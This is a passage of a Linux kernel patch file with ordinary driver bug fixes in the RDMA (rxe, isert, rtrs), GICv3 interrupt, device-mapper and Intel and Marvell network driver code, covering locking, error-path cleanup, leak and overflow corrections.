+-	skb_queue_head_init(&qp->req_pkts);
+-
+-	rxe_init_task(&qp->req.task, qp,
+-		      rxe_requester, "req");
+-	rxe_init_task(&qp->comp.task, qp,
+-		      rxe_completer, "comp");
++	rxe_init_task(&qp->req.task, qp, rxe_requester);
++	rxe_init_task(&qp->comp.task, qp, rxe_completer);
+ 
+ 	qp->qp_timeout_jiffies = 0; /* Can't be set for UD/UC in modify_qp */
+ 	if (init->qp_type == IB_QPT_RC) {
+@@ -290,10 +289,7 @@ static int rxe_qp_init_resp(struct rxe_dev *rxe, struct rxe_qp *qp,
+ 		}
+ 	}
+ 
+-	skb_queue_head_init(&qp->resp_pkts);
+-
+-	rxe_init_task(&qp->resp.task, qp,
+-		      rxe_responder, "resp");
++	rxe_init_task(&qp->resp.task, qp, rxe_responder);
+ 
+ 	qp->resp.opcode		= OPCODE_NONE;
+ 	qp->resp.msn		= 0;
+diff --git a/drivers/infiniband/sw/rxe/rxe_resp.c b/drivers/infiniband/sw/rxe/rxe_resp.c
+index 693081e813ec0..9f65c346d8432 100644
+--- a/drivers/infiniband/sw/rxe/rxe_resp.c
++++ b/drivers/infiniband/sw/rxe/rxe_resp.c
+@@ -466,8 +466,9 @@ static enum resp_states check_rkey(struct rxe_qp *qp,
+ 		if (mw->access & IB_ZERO_BASED)
+ 			qp->resp.offset = mw->addr;
+ 
+-		rxe_put(mw);
+ 		rxe_get(mr);
++		rxe_put(mw);
++		mw = NULL;
+ 	} else {
+ 		mr = lookup_mr(qp->pd, access, rkey, RXE_LOOKUP_REMOTE);
+ 		if (!mr) {
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.c b/drivers/infiniband/sw/rxe/rxe_task.c
+index ec2b7de1c4972..182d0532a8ab9 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.c
++++ b/drivers/infiniband/sw/rxe/rxe_task.c
+@@ -94,12 +94,10 @@ void rxe_do_task(struct tasklet_struct *t)
+ 	task->ret = ret;
+ }
+ 
+-int rxe_init_task(struct rxe_task *task,
+-		  void *arg, int (*func)(void *), char *name)
++int rxe_init_task(struct rxe_task *task, void *arg, int (*func)(void *))
+ {
+ 	task->arg	= arg;
+ 	task->func	= func;
+-	snprintf(task->name, sizeof(task->name), "%s", name);
+ 	task->destroyed	= false;
+ 
+ 	tasklet_setup(&task->tasklet, rxe_do_task);
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.h b/drivers/infiniband/sw/rxe/rxe_task.h
+index 7f612a1c68a7b..b3dfd970d1dc6 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.h
++++ b/drivers/infiniband/sw/rxe/rxe_task.h
+@@ -25,7 +25,6 @@ struct rxe_task {
+ 	void			*arg;
+ 	int			(*func)(void *arg);
+ 	int			ret;
+-	char			name[16];
+ 	bool			destroyed;
+ };
+ 
+@@ -34,8 +33,7 @@ struct rxe_task {
+  *	arg  => parameter to pass to fcn
+  *	func => function to call until it returns != 0
+  */
+-int rxe_init_task(struct rxe_task *task,
+-		  void *arg, int (*func)(void *), char *name);
++int rxe_init_task(struct rxe_task *task, void *arg, int (*func)(void *));
+ 
+ /* cleanup task */
+ void rxe_cleanup_task(struct rxe_task *task);
+diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c
+index 7cca171478a22..a7fef3ea77fe3 100644
+--- a/drivers/infiniband/ulp/isert/ib_isert.c
++++ b/drivers/infiniband/ulp/isert/ib_isert.c
+@@ -657,9 +657,13 @@ static int
+ isert_connect_error(struct rdma_cm_id *cma_id)
+ {
+ 	struct isert_conn *isert_conn = cma_id->qp->qp_context;
++	struct isert_np *isert_np = cma_id->context;
+ 
+ 	ib_drain_qp(isert_conn->qp);
++
++	mutex_lock(&isert_np->mutex);
+ 	list_del_init(&isert_conn->node);
++	mutex_unlock(&isert_np->mutex);
+ 	isert_conn->cm_id = NULL;
+ 	isert_put_conn(isert_conn);
+ 
+@@ -2432,6 +2436,7 @@ isert_free_np(struct iscsi_np *np)
+ {
+ 	struct isert_np *isert_np = np->np_context;
+ 	struct isert_conn *isert_conn, *n;
++	LIST_HEAD(drop_conn_list);
+ 
+ 	if (isert_np->cm_id)
+ 		rdma_destroy_id(isert_np->cm_id);
+@@ -2451,7 +2456,7 @@ isert_free_np(struct iscsi_np *np)
+ 					 node) {
+ 			isert_info("cleaning isert_conn %p state (%d)\n",
+ 				   isert_conn, isert_conn->state);
+-			isert_connect_release(isert_conn);
++			list_move_tail(&isert_conn->node, &drop_conn_list);
+ 		}
+ 	}
+ 
+@@ -2462,11 +2467,16 @@ isert_free_np(struct iscsi_np *np)
+ 					 node) {
+ 			isert_info("cleaning isert_conn %p state (%d)\n",
+ 				   isert_conn, isert_conn->state);
+-			isert_connect_release(isert_conn);
++			list_move_tail(&isert_conn->node, &drop_conn_list);
+ 		}
+ 	}
+ 	mutex_unlock(&isert_np->mutex);
+ 
++	list_for_each_entry_safe(isert_conn, n, &drop_conn_list, node) {
++		list_del_init(&isert_conn->node);
++		isert_connect_release(isert_conn);
++	}
++
+ 	np->np_context = NULL;
+ 	kfree(isert_np);
+ }
+@@ -2561,8 +2571,6 @@ static void isert_wait_conn(struct iscsit_conn *conn)
+ 	isert_put_unsol_pending_cmds(conn);
+ 	isert_wait4cmds(conn);
+ 	isert_wait4logout(isert_conn);
+-
+-	queue_work(isert_release_wq, &isert_conn->release_work);
+ }
+ 
+ static void isert_free_conn(struct iscsit_conn *conn)
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-clt.c b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+index 730f2f1e09bbd..a67f58359de9e 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-clt.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+@@ -2042,6 +2042,7 @@ static int rtrs_clt_rdma_cm_handler(struct rdma_cm_id *cm_id,
+ 	return 0;
+ }
+ 
++/* The caller should do the cleanup in case of error */
+ static int create_cm(struct rtrs_clt_con *con)
+ {
+ 	struct rtrs_path *s = con->c.path;
+@@ -2064,14 +2065,14 @@ static int create_cm(struct rtrs_clt_con *con)
+ 	err = rdma_set_reuseaddr(cm_id, 1);
+ 	if (err != 0) {
+ 		rtrs_err(s, "Set address reuse failed, err: %d\n", err);
+-		goto destroy_cm;
++		return err;
+ 	}
+ 	err = rdma_resolve_addr(cm_id, (struct sockaddr *)&clt_path->s.src_addr,
+ 				(struct sockaddr *)&clt_path->s.dst_addr,
+ 				RTRS_CONNECT_TIMEOUT_MS);
+ 	if (err) {
+ 		rtrs_err(s, "Failed to resolve address, err: %d\n", err);
+-		goto destroy_cm;
++		return err;
+ 	}
+ 	/*
+ 	 * Combine connection status and session events. This is needed
+@@ -2086,29 +2087,15 @@ static int create_cm(struct rtrs_clt_con *con)
+ 		if (err == 0)
+ 			err = -ETIMEDOUT;
+ 		/* Timedout or interrupted */
+-		goto errr;
+-	}
+-	if (con->cm_err < 0) {
+-		err = con->cm_err;
+-		goto errr;
++		return err;
+ 	}
+-	if (READ_ONCE(clt_path->state) != RTRS_CLT_CONNECTING) {
++	if (con->cm_err < 0)
++		return con->cm_err;
++	if (READ_ONCE(clt_path->state) != RTRS_CLT_CONNECTING)
+ 		/* Device removal */
+-		err = -ECONNABORTED;
+-		goto errr;
+-	}
++		return -ECONNABORTED;
+ 
+ 	return 0;
+-
+-errr:
+-	stop_cm(con);
+-	mutex_lock(&con->con_mutex);
+-	destroy_con_cq_qp(con);
+-	mutex_unlock(&con->con_mutex);
+-destroy_cm:
+-	destroy_cm(con);
+-
+-	return err;
+ }
+ 
+ static void rtrs_clt_path_up(struct rtrs_clt_path *clt_path)
+@@ -2336,7 +2323,7 @@ static void rtrs_clt_close_work(struct work_struct *work)
+ static int init_conns(struct rtrs_clt_path *clt_path)
+ {
+ 	unsigned int cid;
+-	int err;
++	int err, i;
+ 
+ 	/*
+ 	 * On every new session connections increase reconnect counter
+@@ -2352,10 +2339,8 @@ static int init_conns(struct rtrs_clt_path *clt_path)
+ 			goto destroy;
+ 
+ 		err = create_cm(to_clt_con(clt_path->s.con[cid]));
+-		if (err) {
+-			destroy_con(to_clt_con(clt_path->s.con[cid]));
++		if (err)
+ 			goto destroy;
+-		}
+ 	}
+ 	err = alloc_path_reqs(clt_path);
+ 	if (err)
+@@ -2366,15 +2351,21 @@ static int init_conns(struct rtrs_clt_path *clt_path)
+ 	return 0;
+ 
+ destroy:
+-	while (cid--) {
+-		struct rtrs_clt_con *con = to_clt_con(clt_path->s.con[cid]);
++	/* Make sure we do the cleanup in the order they are created */
++	for (i = 0; i <= cid; i++) {
++		struct rtrs_clt_con *con;
+ 
+-		stop_cm(con);
++		if (!clt_path->s.con[i])
++			break;
+ 
+-		mutex_lock(&con->con_mutex);
+-		destroy_con_cq_qp(con);
+-		mutex_unlock(&con->con_mutex);
+-		destroy_cm(con);
++		con = to_clt_con(clt_path->s.con[i]);
++		if (con->c.cm_id) {
++			stop_cm(con);
++			mutex_lock(&con->con_mutex);
++			destroy_con_cq_qp(con);
++			mutex_unlock(&con->con_mutex);
++			destroy_cm(con);
++		}
+ 		destroy_con(con);
+ 	}
+ 	/*
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs.c b/drivers/infiniband/ulp/rtrs/rtrs.c
+index ed324b47d93ae..716ec7baddefd 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs.c
+@@ -37,8 +37,10 @@ struct rtrs_iu *rtrs_iu_alloc(u32 iu_num, size_t size, gfp_t gfp_mask,
+ 			goto err;
+ 
+ 		iu->dma_addr = ib_dma_map_single(dma_dev, iu->buf, size, dir);
+-		if (ib_dma_mapping_error(dma_dev, iu->dma_addr))
++		if (ib_dma_mapping_error(dma_dev, iu->dma_addr)) {
++			kfree(iu->buf);
+ 			goto err;
++		}
+ 
+ 		iu->cqe.done  = done;
+ 		iu->size      = size;
+diff --git a/drivers/irqchip/irq-gic-common.c b/drivers/irqchip/irq-gic-common.c
+index a610821c8ff2a..afd6a1841715a 100644
+--- a/drivers/irqchip/irq-gic-common.c
++++ b/drivers/irqchip/irq-gic-common.c
+@@ -16,7 +16,13 @@ void gic_enable_of_quirks(const struct device_node *np,
+ 			  const struct gic_quirk *quirks, void *data)
+ {
+ 	for (; quirks->desc; quirks++) {
+-		if (!of_device_is_compatible(np, quirks->compatible))
++		if (!quirks->compatible && !quirks->property)
++			continue;
++		if (quirks->compatible &&
++		    !of_device_is_compatible(np, quirks->compatible))
++			continue;
++		if (quirks->property &&
++		    !of_property_read_bool(np, quirks->property))
+ 			continue;
+ 		if (quirks->init(data))
+ 			pr_info("GIC: enabling workaround for %s\n",
+@@ -28,7 +34,7 @@ void gic_enable_quirks(u32 iidr, const struct gic_quirk *quirks,
+ 		void *data)
+ {
+ 	for (; quirks->desc; quirks++) {
+-		if (quirks->compatible)
++		if (quirks->compatible || quirks->property)
+ 			continue;
+ 		if (quirks->iidr != (quirks->mask & iidr))
+ 			continue;
+diff --git a/drivers/irqchip/irq-gic-common.h b/drivers/irqchip/irq-gic-common.h
+index 27e3d4ed4f328..3db4592cda1c0 100644
+--- a/drivers/irqchip/irq-gic-common.h
++++ b/drivers/irqchip/irq-gic-common.h
+@@ -13,6 +13,7 @@
+ struct gic_quirk {
+ 	const char *desc;
+ 	const char *compatible;
++	const char *property;
+ 	bool (*init)(void *data);
+ 	u32 iidr;
+ 	u32 mask;
+diff --git a/drivers/irqchip/irq-gic-v3.c b/drivers/irqchip/irq-gic-v3.c
+index 2182f87d2d12e..11f7c53e4b634 100644
+--- a/drivers/irqchip/irq-gic-v3.c
++++ b/drivers/irqchip/irq-gic-v3.c
+@@ -38,6 +38,7 @@
+ 
+ #define FLAGS_WORKAROUND_GICR_WAKER_MSM8996	(1ULL << 0)
+ #define FLAGS_WORKAROUND_CAVIUM_ERRATUM_38539	(1ULL << 1)
++#define FLAGS_WORKAROUND_MTK_GICR_SAVE		(1ULL << 2)
+ 
+ #define GIC_IRQ_TYPE_PARTITION	(GIC_IRQ_TYPE_LPI + 1)
+ 
+@@ -1730,6 +1731,15 @@ static bool gic_enable_quirk_msm8996(void *data)
+ 	return true;
+ }
+ 
++static bool gic_enable_quirk_mtk_gicr(void *data)
++{
++	struct gic_chip_data *d = data;
++
++	d->flags |= FLAGS_WORKAROUND_MTK_GICR_SAVE;
++
++	return true;
++}
++
+ static bool gic_enable_quirk_cavium_38539(void *data)
+ {
+ 	struct gic_chip_data *d = data;
+@@ -1802,6 +1812,11 @@ static const struct gic_quirk gic_quirks[] = {
+ 		.compatible = "qcom,msm8996-gic-v3",
+ 		.init	= gic_enable_quirk_msm8996,
+ 	},
++	{
++		.desc	= "GICv3: Mediatek Chromebook GICR save problem",
++		.property = "mediatek,broken-save-restore-fw",
++		.init	= gic_enable_quirk_mtk_gicr,
++	},
+ 	{
+ 		.desc	= "GICv3: HIP06 erratum 161010803",
+ 		.iidr	= 0x0204043b,
+@@ -1844,6 +1859,11 @@ static void gic_enable_nmi_support(void)
+ 	if (!gic_prio_masking_enabled())
+ 		return;
+ 
++	if (gic_data.flags & FLAGS_WORKAROUND_MTK_GICR_SAVE) {
++		pr_warn("Skipping NMI enable due to firmware issues\n");
++		return;
++	}
++
+ 	ppi_nmi_refs = kcalloc(gic_data.ppi_nr, sizeof(*ppi_nmi_refs), GFP_KERNEL);
+ 	if (!ppi_nmi_refs)
+ 		return;
+diff --git a/drivers/irqchip/irq-meson-gpio.c b/drivers/irqchip/irq-meson-gpio.c
+index 2aaa9aad3e87a..7da18ef952119 100644
+--- a/drivers/irqchip/irq-meson-gpio.c
++++ b/drivers/irqchip/irq-meson-gpio.c
+@@ -150,7 +150,7 @@ static const struct meson_gpio_irq_params s4_params = {
+ 	INIT_MESON_S4_COMMON_DATA(82)
+ };
+ 
+-static const struct of_device_id meson_irq_gpio_matches[] = {
++static const struct of_device_id meson_irq_gpio_matches[] __maybe_unused = {
+ 	{ .compatible = "amlogic,meson8-gpio-intc", .data = &meson8_params },
+ 	{ .compatible = "amlogic,meson8b-gpio-intc", .data = &meson8b_params },
+ 	{ .compatible = "amlogic,meson-gxbb-gpio-intc", .data = &gxbb_params },
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 83aecd9250ba6..6ae1c19b82433 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1151,13 +1151,10 @@ static int do_resume(struct dm_ioctl *param)
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
+ 		sector_t old_size, new_size;
+-		int srcu_idx;
+ 
+ 		/* Suspend if it isn't already suspended */
+-		old_map = dm_get_live_table(md, &srcu_idx);
+-		if ((param->flags & DM_SKIP_LOCKFS_FLAG) || !old_map)
++		if (param->flags & DM_SKIP_LOCKFS_FLAG)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
+-		dm_put_live_table(md, srcu_idx);
+ 		if (param->flags & DM_NOFLUSH_FLAG)
+ 			suspend_flags |= DM_SUSPEND_NOFLUSH_FLAG;
+ 		if (!dm_suspended_md(md))
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 80545ec541210..59eb1cb7037a0 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -1750,13 +1750,15 @@ int dm_thin_remove_range(struct dm_thin_device *td,
+ 
+ int dm_pool_block_is_shared(struct dm_pool_metadata *pmd, dm_block_t b, bool *result)
+ {
+-	int r;
++	int r = -EINVAL;
+ 	uint32_t ref_count;
+ 
+ 	down_read(&pmd->root_lock);
+-	r = dm_sm_get_count(pmd->data_sm, b, &ref_count);
+-	if (!r)
+-		*result = (ref_count > 1);
++	if (!pmd->fail_io) {
++		r = dm_sm_get_count(pmd->data_sm, b, &ref_count);
++		if (!r)
++			*result = (ref_count > 1);
++	}
+ 	up_read(&pmd->root_lock);
+ 
+ 	return r;
+@@ -1764,10 +1766,11 @@ int dm_pool_block_is_shared(struct dm_pool_metadata *pmd, dm_block_t b, bool *re
+ 
+ int dm_pool_inc_data_range(struct dm_pool_metadata *pmd, dm_block_t b, dm_block_t e)
+ {
+-	int r = 0;
++	int r = -EINVAL;
+ 
+ 	pmd_write_lock(pmd);
+-	r = dm_sm_inc_blocks(pmd->data_sm, b, e);
++	if (!pmd->fail_io)
++		r = dm_sm_inc_blocks(pmd->data_sm, b, e);
+ 	pmd_write_unlock(pmd);
+ 
+ 	return r;
+@@ -1775,10 +1778,11 @@ int dm_pool_inc_data_range(struct dm_pool_metadata *pmd, dm_block_t b, dm_block_
+ 
+ int dm_pool_dec_data_range(struct dm_pool_metadata *pmd, dm_block_t b, dm_block_t e)
+ {
+-	int r = 0;
++	int r = -EINVAL;
+ 
+ 	pmd_write_lock(pmd);
+-	r = dm_sm_dec_blocks(pmd->data_sm, b, e);
++	if (!pmd->fail_io)
++		r = dm_sm_dec_blocks(pmd->data_sm, b, e);
+ 	pmd_write_unlock(pmd);
+ 
+ 	return r;
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index d12aff50974a9..601f9e4e6234f 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -398,8 +398,7 @@ static int issue_discard(struct discard_op *op, dm_block_t data_b, dm_block_t da
+ 	sector_t s = block_to_sectors(tc->pool, data_b);
+ 	sector_t len = block_to_sectors(tc->pool, data_e - data_b);
+ 
+-	return __blkdev_issue_discard(tc->pool_dev->bdev, s, len, GFP_NOWAIT,
+-				      &op->bio);
++	return __blkdev_issue_discard(tc->pool_dev->bdev, s, len, GFP_NOIO, &op->bio);
+ }
+ 
+ static void end_discard(struct discard_op *op, int r)
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 24284d22f15bc..acf7e7551c941 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2801,6 +2801,10 @@ retry:
+ 	}
+ 
+ 	map = rcu_dereference_protected(md->map, lockdep_is_held(&md->suspend_lock));
++	if (!map) {
++		/* avoid deadlock with fs/namespace.c:do_mount() */
++		suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
++	}
+ 
+ 	r = __dm_suspend(md, map, suspend_flags, TASK_INTERRUPTIBLE, DMF_SUSPENDED);
+ 	if (r)
+diff --git a/drivers/net/dsa/ocelot/felix_vsc9959.c b/drivers/net/dsa/ocelot/felix_vsc9959.c
+index cc89cff029e1f..5f6af0870dfd6 100644
+--- a/drivers/net/dsa/ocelot/felix_vsc9959.c
++++ b/drivers/net/dsa/ocelot/felix_vsc9959.c
+@@ -1253,7 +1253,7 @@ static void vsc9959_tas_guard_bands_update(struct ocelot *ocelot, int port)
+ 	/* Consider the standard Ethernet overhead of 8 octets preamble+SFD,
+ 	 * 4 octets FCS, 12 octets IFG.
+ 	 */
+-	needed_bit_time_ps = (maxlen + 24) * picos_per_byte;
++	needed_bit_time_ps = (u64)(maxlen + 24) * picos_per_byte;
+ 
+ 	dev_dbg(ocelot->dev,
+ 		"port %d: max frame size %d needs %llu ps at speed %d\n",
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc_qos.c b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+index a8539a8554a13..762849959cc1b 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc_qos.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+@@ -189,8 +189,8 @@ int enetc_setup_tc_cbs(struct net_device *ndev, void *type_data)
+ 	int bw_sum = 0;
+ 	u8 bw;
+ 
+-	prio_top = netdev_get_prio_tc_map(ndev, tc_nums - 1);
+-	prio_next = netdev_get_prio_tc_map(ndev, tc_nums - 2);
++	prio_top = tc_nums - 1;
++	prio_next = tc_nums - 2;
+ 
+ 	/* Support highest prio and second prio tc in cbs mode */
+ 	if (tc != prio_top && tc != prio_next)
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 93a998f169de7..6625625f91e47 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -525,7 +525,7 @@ void iavf_set_ethtool_ops(struct net_device *netdev);
+ void iavf_update_stats(struct iavf_adapter *adapter);
+ void iavf_reset_interrupt_capability(struct iavf_adapter *adapter);
+ int iavf_init_interrupt_scheme(struct iavf_adapter *adapter);
+-void iavf_irq_enable_queues(struct iavf_adapter *adapter, u32 mask);
++void iavf_irq_enable_queues(struct iavf_adapter *adapter);
+ void iavf_free_all_tx_resources(struct iavf_adapter *adapter);
+ void iavf_free_all_rx_resources(struct iavf_adapter *adapter);
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 34711a88dbaa0..965d02d7ff80f 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -359,21 +359,18 @@ static void iavf_irq_disable(struct iavf_adapter *adapter)
+ }
+ 
+ /**
+- * iavf_irq_enable_queues - Enable interrupt for specified queues
++ * iavf_irq_enable_queues - Enable interrupt for all queues
+  * @adapter: board private structure
+- * @mask: bitmap of queues to enable
+  **/
+-void iavf_irq_enable_queues(struct iavf_adapter *adapter, u32 mask)
++void iavf_irq_enable_queues(struct iavf_adapter *adapter)
+ {
+ 	struct iavf_hw *hw = &adapter->hw;
+ 	int i;
+ 
+ 	for (i = 1; i < adapter->num_msix_vectors; i++) {
+-		if (mask & BIT(i - 1)) {
+-			wr32(hw, IAVF_VFINT_DYN_CTLN1(i - 1),
+-			     IAVF_VFINT_DYN_CTLN1_INTENA_MASK |
+-			     IAVF_VFINT_DYN_CTLN1_ITR_INDX_MASK);
+-		}
++		wr32(hw, IAVF_VFINT_DYN_CTLN1(i - 1),
++		     IAVF_VFINT_DYN_CTLN1_INTENA_MASK |
++		     IAVF_VFINT_DYN_CTLN1_ITR_INDX_MASK);
+ 	}
+ }
+ 
+@@ -387,7 +384,7 @@ void iavf_irq_enable(struct iavf_adapter *adapter, bool flush)
+ 	struct iavf_hw *hw = &adapter->hw;
+ 
+ 	iavf_misc_irq_enable(adapter);
+-	iavf_irq_enable_queues(adapter, ~0);
++	iavf_irq_enable_queues(adapter);
+ 
+ 	if (flush)
+ 		iavf_flush(hw);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_register.h b/drivers/net/ethernet/intel/iavf/iavf_register.h
+index bf793332fc9d5..a19e88898a0bb 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_register.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_register.h
+@@ -40,7 +40,7 @@
+ #define IAVF_VFINT_DYN_CTL01_INTENA_MASK IAVF_MASK(0x1, IAVF_VFINT_DYN_CTL01_INTENA_SHIFT)
+ #define IAVF_VFINT_DYN_CTL01_ITR_INDX_SHIFT 3
+ #define IAVF_VFINT_DYN_CTL01_ITR_INDX_MASK IAVF_MASK(0x3, IAVF_VFINT_DYN_CTL01_ITR_INDX_SHIFT)
+-#define IAVF_VFINT_DYN_CTLN1(_INTVF) (0x00003800 + ((_INTVF) * 4)) /* _i=0...15 */ /* Reset: VFR */
++#define IAVF_VFINT_DYN_CTLN1(_INTVF) (0x00003800 + ((_INTVF) * 4)) /* _i=0...63 */ /* Reset: VFR */
+ #define IAVF_VFINT_DYN_CTLN1_INTENA_SHIFT 0
+ #define IAVF_VFINT_DYN_CTLN1_INTENA_MASK IAVF_MASK(0x1, IAVF_VFINT_DYN_CTLN1_INTENA_SHIFT)
+ #define IAVF_VFINT_DYN_CTLN1_SWINT_TRIG_SHIFT 2
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 6a50f8ba3940c..4095fe40dfc9b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -6784,6 +6784,10 @@ int ice_down(struct ice_vsi *vsi)
+ 	ice_for_each_txq(vsi, i)
+ 		ice_clean_tx_ring(vsi->tx_rings[i]);
+ 
++	if (ice_is_xdp_ena_vsi(vsi))
++		ice_for_each_xdp_txq(vsi, i)
++			ice_clean_tx_ring(vsi->xdp_rings[i]);
++
+ 	ice_for_each_rxq(vsi, i)
+ 		ice_clean_rx_ring(vsi->rx_rings[i]);
+ 
+diff --git a/drivers/net/ethernet/intel/igb/igb_ethtool.c b/drivers/net/ethernet/intel/igb/igb_ethtool.c
+index ff911af16a4b5..96fa1c420f910 100644
+--- a/drivers/net/ethernet/intel/igb/igb_ethtool.c
++++ b/drivers/net/ethernet/intel/igb/igb_ethtool.c
+@@ -822,6 +822,8 @@ static int igb_set_eeprom(struct net_device *netdev,
+ 		 */
+ 		ret_val = hw->nvm.ops.read(hw, last_word, 1,
+ 				   &eeprom_buff[last_word - first_word]);
++		if (ret_val)
++			goto out;
+ 	}
+ 
+ 	/* Device's eeprom is always little-endian, word addressable */
+@@ -841,6 +843,7 @@ static int igb_set_eeprom(struct net_device *netdev,
+ 		hw->nvm.ops.update(hw);
+ 
+ 	igb_set_fw_version(adapter);
++out:
+ 	kfree(eeprom_buff);
+ 	return ret_val;
+ }
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index b3aed4e2ca91c..18ffbc892f86c 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -6893,6 +6893,7 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ 	struct e1000_hw *hw = &adapter->hw;
+ 	struct ptp_clock_event event;
+ 	struct timespec64 ts;
++	unsigned long flags;
+ 
+ 	if (pin < 0 || pin >= IGB_N_SDP)
+ 		return;
+@@ -6900,9 +6901,12 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ 	if (hw->mac.type == e1000_82580 ||
+ 	    hw->mac.type == e1000_i354 ||
+ 	    hw->mac.type == e1000_i350) {
+-		s64 ns = rd32(auxstmpl);
++		u64 ns = rd32(auxstmpl);
+ 
+-		ns += ((s64)(rd32(auxstmph) & 0xFF)) << 32;
++		ns += ((u64)(rd32(auxstmph) & 0xFF)) << 32;
++		spin_lock_irqsave(&adapter->tmreg_lock, flags);
++		ns = timecounter_cyc2time(&adapter->tc, ns);
++		spin_unlock_irqrestore(&adapter->tmreg_lock, flags);
+ 		ts = ns_to_timespec64(ns);
+ 	} else {
+ 		ts.tv_nsec = rd32(auxstmpl);
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 1d9b70e0ff67f..3509974c1f8e4 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -255,6 +255,13 @@ static void igc_clean_tx_ring(struct igc_ring *tx_ring)
+ 	/* reset BQL for queue */
+ 	netdev_tx_reset_queue(txring_txq(tx_ring));
+ 
++	/* Zero out the buffer ring */
++	memset(tx_ring->tx_buffer_info, 0,
++	       sizeof(*tx_ring->tx_buffer_info) * tx_ring->count);
++
++	/* Zero out the descriptor ring */
++	memset(tx_ring->desc, 0, tx_ring->size);
++
+ 	/* reset next_to_use and next_to_clean */
+ 	tx_ring->next_to_use = 0;
+ 	tx_ring->next_to_clean = 0;
+@@ -268,7 +275,7 @@ static void igc_clean_tx_ring(struct igc_ring *tx_ring)
+  */
+ void igc_free_tx_resources(struct igc_ring *tx_ring)
+ {
+-	igc_clean_tx_ring(tx_ring);
++	igc_disable_tx_ring(tx_ring);
+ 
+ 	vfree(tx_ring->tx_buffer_info);
+ 	tx_ring->tx_buffer_info = NULL;
+@@ -6678,6 +6685,9 @@ static void igc_remove(struct pci_dev *pdev)
+ 
+ 	igc_ptp_stop(adapter);
+ 
++	pci_disable_ptm(pdev);
++	pci_clear_master(pdev);
++
+ 	set_bit(__IGC_DOWN, &adapter->state);
+ 
+ 	del_timer_sync(&adapter->watchdog_timer);
+diff --git a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+index b45dd7f04e213..8979dd05e873f 100644
+--- a/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
++++ b/drivers/net/ethernet/marvell/octeon_ep/octep_main.c
+@@ -928,6 +928,9 @@ int octep_device_setup(struct octep_device *oct)
+ 		oct->mmio[i].hw_addr =
+ 			ioremap(pci_resource_start(oct->pdev, i * 2),
+ 				pci_resource_len(oct->pdev, i * 2));
++		if (!oct->mmio[i].hw_addr)
++			goto unmap_prev;
++
+ 		oct->mmio[i].mapped = 1;
+ 	}
+ 
+@@ -966,7 +969,9 @@ int octep_device_setup(struct octep_device *oct)
+ 	return 0;
+ 
+ unsupported_dev:
+-	for (i = 0; i < OCTEP_MMIO_REGIONS; i++)
++	i = OCTEP_MMIO_REGIONS;
++unmap_prev:
++	while (i--)
+ 		iounmap(oct->mmio[i].hw_addr);
+ 
+ 	kfree(oct->conf);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 84f2ba53b8b68..8cb2a0181fb9b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -1878,7 +1878,8 @@ static int nix_check_txschq_alloc_req(struct rvu *rvu, int lvl, u16 pcifunc,
